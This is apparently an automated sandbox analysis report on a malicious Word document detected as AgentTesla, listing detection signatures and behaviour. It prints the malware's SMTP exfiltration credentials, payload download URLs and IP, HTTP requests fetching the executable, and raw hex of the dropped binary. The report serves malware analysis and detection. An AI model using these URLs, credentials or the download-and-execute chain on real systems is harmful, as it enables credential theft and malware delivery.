Windows Analysis Report 478644.doc

Overview

General Information

Sample Name:	478644.doc
Analysis ID:	553100
MD5:	c0f8f2fc481e9be7141d84b401edf1f7
SHA1:	ab1dbe841b083ea886c9023307c0527f7bfbfff3
SHA256:	4b0d21f58347c62f76445c6aa17a21dd00970f235734a1d1db4a40ee5a8b7c45
Tags:	doc
Infos:
Most interesting Screenshot:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Document exploit detected (drops PE files)

Yara detected AgentTesla

Sigma detected: Powershell download and execute file

Document exploit detected (creates forbidden files)

Microsoft Office creates scripting files

Office process drops PE file

Injects files into Windows application

Document contains OLE streams with names of living off the land binaries

Bypasses PowerShell execution policy

Sigma detected: Change PowerShell Policies to a Unsecure Level

Sigma detected: Microsoft Office Product Spawning Windows Shell

Sigma detected: PowerShell DownloadFile

Yara detected Costura Assembly Loader

Tries to download and execute files (via powershell)

Suspicious powershell command line found

Document contains a stream with embedded javascript code

Injects a PE file into a foreign processes

Powershell drops PE file

.NET source code contains very large array initializations

Machine Learning detection for dropped file

Found suspicious RTF objects

Document exploit detected (process start blacklist hit)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

Document has an unknown application name

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Yara detected Credential Stealer

Sigma detected: Verclsid.exe Runs COM Object

Potential document exploit detected (performs DNS queries)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Downloads executable code via HTTP

Document misses a certain OLE stream usually present in this Microsoft Office document type

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Document contains no OLE stream with summary information

Found inlined nop instructions (likely shell or obfuscated code)

Sigma detected: PowerShell Download from URL

Potential document exploit detected (unknown TCP traffic)

PE file contains strange resources

Drops PE files

Uses a known web browser user agent for HTTP communication

Binary contains a suspicious time stamp

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Sigma detected: Windows Suspicious Use Of Web Request in CommandLine

Potential document exploit detected (performs HTTP gets)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Classification

Signatures

AV Detection:

Found malware configuration

Source: 41.0.okcff.exe.400000.5.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "hisgraceinme@yandex.com", "Password": "newyear2022", "Host": "smtp.yandex.com"}

Multi AV Scanner detection for submitted file

Source: 478644.doc	Virustotal: Detection: 41%			Perma Link
Source: 478644.doc	ReversingLabs: Detection: 30%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\okcff[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\okcff.exe	Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 41.0.okcff.exe.400000.5.unpack	Avira: Label: TR/Spy.Gen8
Source: 41.0.okcff.exe.400000.7.unpack	Avira: Label: TR/Spy.Gen8
Source: 41.0.okcff.exe.400000.9.unpack	Avira: Label: TR/Spy.Gen8
Source: 41.0.okcff.exe.400000.13.unpack	Avira: Label: TR/Spy.Gen8
Source: 41.0.okcff.exe.400000.11.unpack	Avira: Label: TR/Spy.Gen8

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp
Source:	Binary string: System.Management.Automation.pdbBBa?p source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp
Source:	Binary string: ws\System.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source:	Binary string: :\Windows\mscorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.pdbment.Automation.pdbBB source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source:	Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source:	Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source:	Binary string: :\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source:	Binary string: ws\dll\System.pdben source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source:	Binary string: protobuf-net.pdbSHA256 source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmp
Source:	Binary string: protobuf-net.pdb source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp, powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp, powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp, powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source:	Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Software Vulnerabilities:

Document exploit detected (drops PE files)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: okcff[1].exe.0.dr

Jump to dropped file

Document exploit detected (creates forbidden files)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\okcff[1].exe			Jump to behavior

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: mitmar-pl.com

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\AppData\Roaming\okcff.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	9_2_021AC348
Source: C:\Users\user\AppData\Roaming\okcff.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	9_2_021AC43D
Source: C:\Users\user\AppData\Roaming\okcff.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 7FFFFFFFh	9_2_021AC915
Source: C:\Users\user\AppData\Roaming\okcff.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 7FFFFFFFh	9_2_021AC920

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 37.0.9.166:80

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 37.0.9.166:80

Networking:

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: WKD-ASIE WKD-ASIE

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /okcff.exe HTTP/1.1Host: mitmar-pl.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /okcff.exe HTTP/1.1Host: mitmar-pl.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Crkrqdrd.jpeg HTTP/1.1Host: mitmar-pl.comConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 37.0.9.166 37.0.9.166

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 14 Jan 2022 09:23:18 GMTContent-Type: application/x-msdownloadContent-Length: 194560Last-Modified: Fri, 14 Jan 2022 05:56:32 GMTConnection: keep-aliveETag: "61e11090-2f800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9a 59 03 f6 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 54 00 00 00 a2 02 00 00 00 00 00 4e 73 00 00 00 20 00 00 00 80 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 03 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 73 00 00 4b 00 00 00 00 80 00 00 58 9f 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 03 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 53 00 00 00 20 00 00 00 54 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 58 9f 02 00 00 80 00 00 00 a0 02 00 00 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 03 00 00 02 00 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 73 00 00 00 00 00 00 48 00 00 00 02 00 05 00 98 42 00 00 b0 2f 00 00 03 00 00 00 01 00 00 06 48 72 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 1f 00 00 00 01 00 00 11 00 72 01 00 00 70 28 01 00 00 0a 28 02 00 00 0a 14 28 02 00 00 06 0a 06 28 03 00 00 0a 00 2a 00 1b 30 08 00 51 0c 00 00 02 00 00 11 20 0f 00 00 00 fe 0e 24 00 38 00 00 00 00 fe 0c 24 00 45 1f 00 00 00 e1 0a 00 00 19 0a 00 00 a4 01 00 00 ae 01 00 00 83 01 00 00 53 01 00 00 a8 0a 00 00 0c 0b 00 00 8f 02 00 00 63 05 00 00 dc 02 00 00 90 01 00 00 5e 09 00 00 b9 01 00 00 b2 02 00 00 37 05 00 00 3e 0b 00 00 32 0a 00 00 86 08 00 00 f1 03 00 00 0b 0a 00 00 9d 0b 00 00 28 0a 00 00 f7 01 00 00 cd 09 00 00 ca 01 00 00 97 0a 00 00 5b 09 00 00 f4 0a 00 00 1b 08 00 00 6d 0b 00 00 38 dc 0a 00 00 00 38 4d 00 00 00 20 03 00 00 00 7e 5f 00 00 04 3a 0f 00 00 00 26 20 01 00 00 00 38 04 00 00 00 fe 0c 28 00 45 04 00 00 00 05 00 00 00 71 00 00 00 99 00 00 00 5e 00 00 00 38 00 00 00 00 11 03 11 19 16 11 19 8e 69 6f 04 00 00 0a 38 00 00 00 00 00 00 11 2f 28 19 00 00 06 3a 38 00 00 00 20 02 00 00 00 38 bb ff ff ff 00 11 2c 11 17 04 11 17 28
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 14 Jan 2022 09:23:22 GMTContent-Type: application/x-msdownloadContent-Length: 194560Last-Modified: Fri, 14 Jan 2022 05:56:32 GMTConnection: keep-aliveETag: "61e11090-2f800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9a 59 03 f6 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 54 00 00 00 a2 02 00 00 00 00 00 4e 73 00 00 00 20 00 00 00 80 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 03 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 73 00 00 4b 00 00 00 00 80 00 00 58 9f 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 03 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 53 00 00 00 20 00 00 00 54 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 58 9f 02 00 00 80 00 00 00 a0 02 00 00 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 03 00 00 02 00 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 73 00 00 00 00 00 00 48 00 00 00 02 00 05 00 98 42 00 00 b0 2f 00 00 03 00 00 00 01 00 00 06 48 72 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 1f 00 00 00 01 00 00 11 00 72 01 00 00 70 28 01 00 00 0a 28 02 00 00 0a 14 28 02 00 00 06 0a 06 28 03 00 00 0a 00 2a 00 1b 30 08 00 51 0c 00 00 02 00 00 11 20 0f 00 00 00 fe 0e 24 00 38 00 00 00 00 fe 0c 24 00 45 1f 00 00 00 e1 0a 00 00 19 0a 00 00 a4 01 00 00 ae 01 00 00 83 01 00 00 53 01 00 00 a8 0a 00 00 0c 0b 00 00 8f 02 00 00 63 05 00 00 dc 02 00 00 90 01 00 00 5e 09 00 00 b9 01 00 00 b2 02 00 00 37 05 00 00 3e 0b 00 00 32 0a 00 00 86 08 00 00 f1 03 00 00 0b 0a 00 00 9d 0b 00 00 28 0a 00 00 f7 01 00 00 cd 09 00 00 ca 01 00 00 97 0a 00 00 5b 09 00 00 f4 0a 00 00 1b 08 00 00 6d 0b 00 00 38 dc 0a 00 00 00 38 4d 00 00 00 20 03 00 00 00 7e 5f 00 00 04 3a 0f 00 00 00 26 20 01 00 00 00 38 04 00 00 00 fe 0c 28 00 45 04 00 00 00 05 00 00 00 71 00 00 00 99 00 00 00 5e 00 00 00 38 00 00 00 00 11 03 11 19 16 11 19 8e 69 6f 04 00 00 0a 38 00 00 00 00 00 00 11 2f 28 19 00 00 06 3a 38 00 00 00 20 02 00 00 00 38 bb ff ff ff 00 11 2c 11 17 04 11 17 28
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 14 Jan 2022 09:23:23 GMTContent-Type: application/x-msdownloadContent-Length: 194560Last-Modified: Fri, 14 Jan 2022 05:56:32 GMTConnection: keep-aliveETag: "61e11090-2f800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9a 59 03 f6 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 54 00 00 00 a2 02 00 00 00 00 00 4e 73 00 00 00 20 00 00 00 80 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 03 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 73 00 00 4b 00 00 00 00 80 00 00 58 9f 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 03 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 53 00 00 00 20 00 00 00 54 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 58 9f 02 00 00 80 00 00 00 a0 02 00 00 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 03 00 00 02 00 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 73 00 00 00 00 00 00 48 00 00 00 02 00 05 00 98 42 00 00 b0 2f 00 00 03 00 00 00 01 00 00 06 48 72 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 1f 00 00 00 01 00 00 11 00 72 01 00 00 70 28 01 00 00 0a 28 02 00 00 0a 14 28 02 00 00 06 0a 06 28 03 00 00 0a 00 2a 00 1b 30 08 00 51 0c 00 00 02 00 00 11 20 0f 00 00 00 fe 0e 24 00 38 00 00 00 00 fe 0c 24 00 45 1f 00 00 00 e1 0a 00 00 19 0a 00 00 a4 01 00 00 ae 01 00 00 83 01 00 00 53 01 00 00 a8 0a 00 00 0c 0b 00 00 8f 02 00 00 63 05 00 00 dc 02 00 00 90 01 00 00 5e 09 00 00 b9 01 00 00 b2 02 00 00 37 05 00 00 3e 0b 00 00 32 0a 00 00 86 08 00 00 f1 03 00 00 0b 0a 00 00 9d 0b 00 00 28 0a 00 00 f7 01 00 00 cd 09 00 00 ca 01 00 00 97 0a 00 00 5b 09 00 00 f4 0a 00 00 1b 08 00 00 6d 0b 00 00 38 dc 0a 00 00 00 38 4d 00 00 00 20 03 00 00 00 7e 5f 00 00 04 3a 0f 00 00 00 26 20 01 00 00 00 38 04 00 00 00 fe 0c 28 00 45 04 00 00 00 05 00 00 00 71 00 00 00 99 00 00 00 5e 00 00 00 38 00 00 00 00 11 03 11 19 16 11 19 8e 69 6f 04 00 00 0a 38 00 00 00 00 00 00 11 2f 28 19 00 00 06 3a 38 00 00 00 20 02 00 00 00 38 bb ff ff ff 00 11 2c 11 17 04 11 17 28

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /okcff.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: mitmar-pl.comConnection: Keep-Alive

Source: notepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: powershell.exe, 00000005.00000002.444344400.000000000370C000.00000004.00000001.sdmp	String found in binary or memory: httP://mitmar-pl.com/ok
Source: powershell.exe, 00000005.00000002.444344400.000000000370C000.00000004.00000001.sdmp	String found in binary or memory: httP://mitmar-pl.com/okcff.ex
Source: powershell.exe, 00000005.00000002.444344400.000000000370C000.00000004.00000001.sdmp	String found in binary or memory: httP://mitmar-pl.com/okcff.exe
Source: powershell.exe, 00000003.00000002.440935004.000000000371C000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.444344400.000000000370C000.00000004.00000001.sdmp	String found in binary or memory: httP://mitmar-pl.com/okcff.exePE
Source: notepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com
Source: notepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000003.00000002.440935004.000000000371C000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.441337667.0000000003819000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.621297461.00000000022C1000.00000004.00000001.sdmp	String found in binary or memory: http://mitmar-pl.com
Source: okcff.exe	String found in binary or memory: http://mitmar-pl.com/Crkrqdrd.jpeg
Source: okcff.exe, 00000009.00000000.439195914.00000000009F2000.00000020.00020000.sdmp, okcff.exe, 00000009.00000002.620997931.00000000009F2000.00000020.00020000.sdmp	String found in binary or memory: http://mitmar-pl.com/Crkrqdrd.jpegi
Source: powershell.exe, 00000003.00000002.440935004.000000000371C000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.444532419.000000001B5C6000.00000004.00000001.sdmp	String found in binary or memory: http://mitmar-pl.com/okcff.exe
Source: powershell.exe, 00000003.00000002.437210048.00000000023B0000.00000002.00020000.sdmp, powershell.exe, 00000005.00000002.438620831.0000000002450000.00000002.00020000.sdmp, okcff.exe, 00000009.00000002.624048048.0000000004D70000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: okcff.exe, 00000009.00000002.621297461.00000000022C1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.437210048.00000000023B0000.00000002.00020000.sdmp, powershell.exe, 00000005.00000002.438620831.0000000002450000.00000002.00020000.sdmp, okcff.exe, 00000009.00000002.624048048.0000000004D70000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: notepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: notepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000005.00000002.438200981.00000000003EF000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/cclean
Source: powershell.exe, 00000005.00000002.438200981.00000000003EF000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerv
Source: notepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: okcff.exe	String found in binary or memory: https://google.com
Source: okcff.exe, 00000009.00000002.621297461.00000000022C1000.00000004.00000001.sdmp	String found in binary or memory: https://google.com/
Source: okcff.exe, 00000009.00000002.621297461.00000000022C1000.00000004.00000001.sdmp	String found in binary or memory: https://google.comD
Source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.621327809.00000000022E7000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
